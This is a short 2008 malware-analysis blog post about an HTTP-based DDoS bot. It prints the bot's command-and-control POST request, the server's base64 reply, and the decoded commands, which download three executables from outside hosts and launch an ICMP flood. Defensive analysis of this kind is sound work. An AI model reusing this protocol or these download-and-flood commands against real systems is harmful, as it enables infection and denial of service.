HTTP-based Botnets
Saturday, June 7. 2008
We observe more and more botnets using HTTP-based communication channels. Quite often, these bots are used for DDoS attacks as the following example explains. We recently analyzed a bot with CWSandbox (MD5: 112ccb580b0013f967b6ba991802850d) that first performs the usual steps during a bot infection, e.g., copying itself to the Windows system folder and adding registry keys such that the bot is started as a service after a reboot. The bot then issues the following (obfuscated) HTTP request:
The answer from the server is:
The response is base64-encoded and decoding leads to the following (obfuscated) commands:
Thus three additional malware binaries are installed on the compromised machine and the bot also starts an ICMP-based DDoS attack against the specified target.
POST /ddd/stat.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: life-tablets.xxx
Content-Length: 27
Cache-Control: no-cache
id=xMACHINENAME_0&build_id=1362B8E
The answer from the server is:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Jun 2008 19:59:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
fc
MTA7MjAwMDsxMDsxOzA7MzA7MTAwOzM7MjA7MTAwMDsy
MDAwI2dldCBodHRwOi8vZGZ0cmVvLmNvbS9sZi9lL2kuZXhl
O2dldCBodHRwOi8vZGZ0cmVvLmNvbS9sZi9lLzEwMDAuZXh
lO2dldCBodHRwOi8vbGlmZS10YWJsZXRzLmNuL2xmL2xvY
WQuZXhlO2Zsb29kIGljbXAgbGliZXJ0eXJlc2VydmVkaXJlY3R
vcnkuY29tIzEwIw==
0
The response is base64-encoded and decoding leads to the following (obfuscated) commands:
10;2000;10;1;0;30;100;3;20;1000;2000#
get hxxp://dftreo.xxx/lf/e/i.exe;
get hxxp://dftreo.xxx/lf/e/1000.exe;
get hxxp://life-tablets.xxx/lf/load.exe;
flood icmp TARGET.COM&10;
Thus three additional malware binaries are installed on the compromised machine and the bot also starts an ICMP-based DDoS attack against the specified target.
".
